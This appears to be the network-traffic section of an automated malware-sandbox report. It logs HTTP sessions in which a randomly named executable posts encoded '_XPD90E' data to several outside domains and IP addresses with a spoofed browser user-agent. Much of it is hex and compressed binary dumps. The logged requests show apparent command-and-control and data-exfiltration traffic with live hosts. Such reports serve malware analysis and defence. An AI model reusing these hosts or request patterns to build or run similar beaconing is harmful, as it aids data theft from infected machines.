                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-powered-by: WP Engine
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      X-Redirect-By: WordPress
                                                                                                      Location: http://meanttobebroken.org/9g6s/?_XPD90E=l/X+t9hb8CWGjOR6SGZVUSer8Zv3g1fAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvXswkeLIgZt7sZdEg/e0UbdbzANigZVdYlcc=&qp=qTZ8t28
                                                                                                      X-Cacheable: non200
                                                                                                      Cache-Control: max-age=600, must-revalidate
                                                                                                      X-Cache: MISS
                                                                                                      X-Cache-Group: normal
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a31bf8c86c80-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.4498038.210.3.99805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:12.389537096 CEST709OUTPOST /li8d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.jexiz.shop
                                                                                                      Origin: http://www.jexiz.shop
                                                                                                      Referer: http://www.jexiz.shop/li8d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 68 6b 57 52 73 56 78 65 46 66 74 73 70 63 6f 57 66 70 6d 2f 48 4d 72 73 58 44 41 65 4e 32 4c 74 67 50 57 5a 2b 64 49 56 4b 65 2b 59 4e 4a 6f 70 7a 4a 63 65 6d 71 31 5a 59 4b 7a 55 76 77 61 4f 32 43 54 44 75 30 61 6a 4e 6d 74 71 33 4c 33 56 6d 47 76 70 74 4f 63 7a 54 35 65 77 51 36 30 50 61 51 45 4f 64 2b 63 37 52 59 65 2f 53 43 79 52 38 78 58 4f 67 32 46 6a 31 42 6e 71 4d 65 39 55 51 4a 6d 6d 47 38 66 70 59 2b 32 4a 58 69 6b 4d 6e 75 73 73 51 41 72 69 52 4b 30 4f 5a 6c 73 74 49 6d 62 77 4d 43 70 67 79 53 51 49 62 50 36 63 50 6b 50 78 5a 45 77 35 4b 66 33 7a 70 64 63 65 72 67 3d 3d
                                                                                                      Data Ascii: _XPD90E=hkWRsVxeFftspcoWfpm/HMrsXDAeN2LtgPWZ+dIVKe+YNJopzJcemq1ZYKzUvwaO2CTDu0ajNmtq3L3VmGvptOczT5ewQ60PaQEOd+c7RYe/SCyR8xXOg2Fj1BnqMe9UQJmmG8fpY+2JXikMnussQAriRK0OZlstImbwMCpgySQIbP6cPkPxZEw5Kf3zpdcerg==
                                                                                                      Oct 22, 2024 09:05:13.362375021 CEST417INHTTP/1.1 301 Moved Permanently
                                                                                                      Location: https://www.jexiz.shop/li8d/
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Date: Tue, 22 Oct 2024 07:05:13 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 226
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.4498198.210.3.99805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:14.937289953 CEST729OUTPOST /li8d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.jexiz.shop
                                                                                                      Origin: http://www.jexiz.shop
                                                                                                      Referer: http://www.jexiz.shop/li8d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 68 6b 57 52 73 56 78 65 46 66 74 73 6f 39 34 57 64 4b 2b 2f 57 63 72 72 4c 7a 41 65 43 57 4c 70 67 50 61 5a 2b 66 6b 46 4b 74 61 59 4e 6f 59 70 79 4c 6b 65 6e 71 31 5a 54 71 7a 56 6c 51 61 46 32 43 66 68 75 30 32 6a 4e 6d 35 71 33 4f 54 56 6d 33 76 6d 73 65 63 78 61 5a 65 79 4e 4b 30 50 61 51 45 4f 64 2b 59 52 52 63 36 2f 53 52 71 52 39 51 58 4e 6a 32 46 67 38 68 6e 71 48 2b 39 51 51 4a 6d 55 47 39 44 48 59 38 2b 4a 58 6a 55 4d 6b 38 49 74 61 41 72 6b 63 71 30 66 66 6e 6c 63 52 47 65 2b 53 52 55 46 7a 79 67 37 61 4a 33 47 65 56 75 6d 4c 45 55 4b 58 59 2b 48 6b 65 68 58 77 71 56 65 32 4a 32 6a 32 34 2b 6f 31 4b 62 67 52 57 4f 6e 66 51 51 3d
                                                                                                      Data Ascii: _XPD90E=hkWRsVxeFftso94WdK+/WcrrLzAeCWLpgPaZ+fkFKtaYNoYpyLkenq1ZTqzVlQaF2Cfhu02jNm5q3OTVm3vmsecxaZeyNK0PaQEOd+YRRc6/SRqR9QXNj2Fg8hnqH+9QQJmUG9DHY8+JXjUMk8ItaArkcq0ffnlcRGe+SRUFzyg7aJ3GeVumLEUKXY+HkehXwqVe2J2j24+o1KbgRWOnfQQ=
                                                                                                      Oct 22, 2024 09:05:15.909924984 CEST417INHTTP/1.1 301 Moved Permanently
                                                                                                      Location: https://www.jexiz.shop/li8d/
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Date: Tue, 22 Oct 2024 07:05:15 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 226
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.4498338.210.3.99805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:17.479896069 CEST10811OUTPOST /li8d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.jexiz.shop
                                                                                                      Origin: http://www.jexiz.shop
                                                                                                      Referer: http://www.jexiz.shop/li8d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 68 6b 57 52 73 56 78 65 46 66 74 73 6f 39 34 57 64 4b 2b 2f 57 63 72 72 4c 7a 41 65 43 57 4c 70 67 50 61 5a 2b 66 6b 46 4b 74 53 59 4d 61 51 70 30 73 49 65 6b 71 31 5a 50 61 7a 59 6c 51 61 59 32 43 58 6c 75 30 71 73 4e 6c 42 71 33 6f 50 56 67 44 44 6d 69 75 63 78 58 35 65 78 51 36 30 61 61 55 67 43 64 2b 49 52 52 63 36 2f 53 51 61 52 74 78 58 4e 6c 32 46 6a 31 42 6e 59 4d 65 39 34 51 4a 75 2b 47 38 33 35 59 4e 65 4a 58 41 73 4d 72 75 51 74 57 41 72 6d 62 71 31 43 66 6e 35 48 52 47 43 45 53 51 68 75 7a 78 38 37 59 4f 72 64 47 55 75 69 52 30 4d 41 4d 2f 6d 54 6a 73 4d 61 32 49 78 72 6c 4b 4f 73 73 35 43 7a 32 70 71 51 4c 32 4b 63 45 6e 69 39 4d 6f 61 34 2b 59 41 6b 77 4f 66 45 47 44 4c 4c 56 55 4f 38 65 36 61 48 47 46 7a 34 64 46 54 36 4d 38 6b 72 4f 47 64 74 36 78 75 65 54 50 44 50 2f 42 30 66 4d 38 68 6e 6a 45 65 48 56 43 32 4c 32 41 46 63 6a 54 55 7a 47 43 77 78 4e 37 47 5a 46 43 76 4f 32 4b 34 70 66 30 53 68 45 32 58 73 4d 32 51 50 4d 75 6d 79 74 57 2f 44 66 69 72 70 78 71 [TRUNCATED]
                                                                                                      Data Ascii: _XPD90E=hkWRsVxeFftso94WdK+/WcrrLzAeCWLpgPaZ+fkFKtSYMaQp0sIekq1ZPazYlQaY2CXlu0qsNlBq3oPVgDDmiucxX5exQ60aaUgCd+IRRc6/SQaRtxXNl2Fj1BnYMe94QJu+G835YNeJXAsMruQtWArmbq1Cfn5HRGCESQhuzx87YOrdGUuiR0MAM/mTjsMa2IxrlKOss5Cz2pqQL2KcEni9Moa4+YAkwOfEGDLLVUO8e6aHGFz4dFT6M8krOGdt6xueTPDP/B0fM8hnjEeHVC2L2AFcjTUzGCwxN7GZFCvO2K4pf0ShE2XsM2QPMumytW/Dfirpxq1kQ/QmWC3Ih89g7HRfw5mJ4/HO7ME2RYpMcDf83V4gSMNrO7Lz80sKuqatJt6+Ojnm5G6YBY0SICXtKCPL5+LS/5oZe7tyNtNOaicpYwsMwx/5lspMcrkPsG3iKkeCdMBMeRHUAIRjM9XLLD61bni84wLn3vZG/GAcnkQprw2EUXgCCp0vqC/CPCScEW1XC53Zcx1u/hmYKpXAeX4JW3yrUpjKqxy/aLuRIJfjLbMBqc0XlyZOm+4ZLmkDimeUm9fz25+MRE25uwDmL3B9e50hkVyrXAK5AmmrCRFv+UxetfAcK6UtQBoj7kJNfEhyxa/ZCUn7KJvaFUPwnjJqV1QE4g13elxDiKdTlGYufBK0ZxMSggIH5wXgFJcYhivSyf1pncTt/kA49aRqYZtDrmiDHjtx4kcT/VHUrTkz2aqwNk5zcS/K7I5wvZN9YYih8677tSEYiVN4uHtrUUCAwwvsWShdFn/r+Bad1x8ZzTPgoUibO3Ccx79W3CX3n8CIiL6wuKYhzjVQw2rAeb1pQzKsnxOoCL/fD75BSn1m6fmTDdN2QoYzXIakV7kemhUORMxR48AU/t/KMlrqeN92lAP3ITxYMC22QRVZz51S5uxge//lqruPRmkSLgV3s2vAcpWRnEJjjjZzsi6hxuEneE3rqkR09LxLtftS [TRUNCATED]
                                                                                                      Oct 22, 2024 09:05:18.448095083 CEST417INHTTP/1.1 301 Moved Permanently
                                                                                                      Location: https://www.jexiz.shop/li8d/
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Date: Tue, 22 Oct 2024 07:05:18 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 226
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.4498468.210.3.99805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:20.047442913 CEST448OUTGET /li8d/?qp=qTZ8t28&_XPD90E=sm+xvlFNJ8Jn1MAgd7H5GM7xL3QFLG7nhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbr4aM8dbnuEYYtVmB+eJtacLqhBkyb5k3hgGU= HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.jexiz.shop
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:05:21.006030083 CEST701INHTTP/1.1 301 Moved Permanently
                                                                                                      Location: https://www.jexiz.shop/li8d/?qp=qTZ8t28&_XPD90E=sm+xvlFNJ8Jn1MAgd7H5GM7xL3QFLG7nhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbr4aM8dbnuEYYtVmB+eJtacLqhBkyb5k3hgGU=
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Date: Tue, 22 Oct 2024 07:05:20 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 370
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 3f 71 70 3d 71 54 5a 38 74 32 38 26 61 6d 70 3b 5f 58 50 44 39 30 45 3d 73 6d 2b 78 76 6c 46 4e 4a 38 4a 6e 31 4d 41 67 64 37 48 35 47 4d 37 78 4c 33 51 46 4c 47 37 6e 68 59 75 44 74 4e 34 51 44 75 75 6f 4f 49 51 37 32 49 42 52 37 76 74 58 53 72 50 30 69 6d 54 38 75 51 44 2b 69 30 32 34 4a 79 30 35 67 4a 76 72 73 6d 62 72 34 61 4d 38 64 62 6e 75 45 59 59 74 56 6d 42 2b 65 4a 74 61 63 4c 71 68 42 6b 79 62 35 6b 33 68 67 47 55 3d 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 [TRUNCATED]
                                                                                                      Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/?qp=qTZ8t28&amp;_XPD90E=sm+xvlFNJ8Jn1MAgd7H5GM7xL3QFLG7nhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbr4aM8dbnuEYYtVmB+eJtacLqhBkyb5k3hgGU='"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.449882162.0.215.244805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:26.388324022 CEST733OUTPOST /3lre/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.prediksipreman.fyi
                                                                                                      Origin: http://www.prediksipreman.fyi
                                                                                                      Referer: http://www.prediksipreman.fyi/3lre/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 79 34 39 39 71 4c 68 48 69 56 4a 6f 64 56 62 4a 4a 48 73 59 6d 38 32 68 34 55 41 51 6d 4f 79 46 33 77 2f 33 70 72 44 79 49 57 51 33 2f 70 7a 54 50 38 58 5a 68 35 68 38 31 33 5a 77 31 51 47 39 52 66 73 36 71 75 44 2f 74 71 33 6a 53 49 41 45 6f 71 4f 42 48 58 5a 4c 62 58 34 4f 73 62 5a 72 75 58 62 50 66 7a 62 56 47 32 45 68 51 43 2b 6e 4f 70 6a 72 53 50 6b 47 6f 59 39 69 6c 69 61 48 42 42 39 6f 35 35 55 74 70 4a 63 58 6b 50 66 50 48 4e 67 50 63 67 62 47 33 4f 50 73 38 70 46 50 50 73 71 43 6c 68 4f 52 34 39 74 66 69 74 56 76 76 65 50 75 2f 68 6a 4e 66 41 74 75 6d 61 65 54 52 41 3d 3d
                                                                                                      Data Ascii: _XPD90E=y499qLhHiVJodVbJJHsYm82h4UAQmOyF3w/3prDyIWQ3/pzTP8XZh5h813Zw1QG9Rfs6quD/tq3jSIAEoqOBHXZLbX4OsbZruXbPfzbVG2EhQC+nOpjrSPkGoY9iliaHBB9o55UtpJcXkPfPHNgPcgbG3OPs8pFPPsqClhOR49tfitVvvePu/hjNfAtumaeTRA==
                                                                                                      Oct 22, 2024 09:05:27.248363018 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      keep-alive: timeout=5, max=100
                                                                                                      content-type: text/html
                                                                                                      transfer-encoding: chunked
                                                                                                      content-encoding: gzip
                                                                                                      vary: Accept-Encoding
                                                                                                      date: Tue, 22 Oct 2024 07:05:26 GMT
                                                                                                      server: LiteSpeed
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      connection: close
                                                                                                      Data Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                                                      Data Ascii: 1350ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                                                                      Oct 22, 2024 09:05:27.248508930 CEST1236INData Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                                                                      Oct 22, 2024 09:05:27.248522043 CEST424INData Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                                                                      Oct 22, 2024 09:05:27.249203920 CEST424INData Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                                                                      Oct 22, 2024 09:05:27.249696970 CEST1236INData Raw: d5 e1 7e a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b4 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1
                                                                                                      Data Ascii: ~cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}Zv
                                                                                                      Oct 22, 2024 09:05:27.249708891 CEST212INData Raw: 78 3b ac 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90
                                                                                                      Data Ascii: x;uW$FNcYXp8.Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(
                                                                                                      Oct 22, 2024 09:05:27.249722958 CEST892INData Raw: d0 cd d9 c9 8a 42 ab f5 84 84 f9 bd e9 34 1e 36 e1 3b c5 50 82 49 0a 49 07 aa d6 64 1f 16 6c 62 6b 24 e4 f6 b0 46 72 8a 96 e9 f1 36 a2 2c 12 8d ce a4 c7 65 43 d9 44 0a 4a 35 74 72 ae 72 5b 10 fb 22 ca 34 bd 54 53 c2 1d c7 0b 0a c3 58 76 da e5 81
                                                                                                      Data Ascii: B46;PIIdlbk$Fr6,eCDJ5trr["4TSXv)J.Zp%gux6I]aq8L\|zg>7i|d$Gy'r|oIR#W*o=-B_!w}tf`fY>}X^/s@=T^+L


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.449898162.0.215.244805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:28.934535027 CEST753OUTPOST /3lre/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.prediksipreman.fyi
                                                                                                      Origin: http://www.prediksipreman.fyi
                                                                                                      Referer: http://www.prediksipreman.fyi/3lre/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
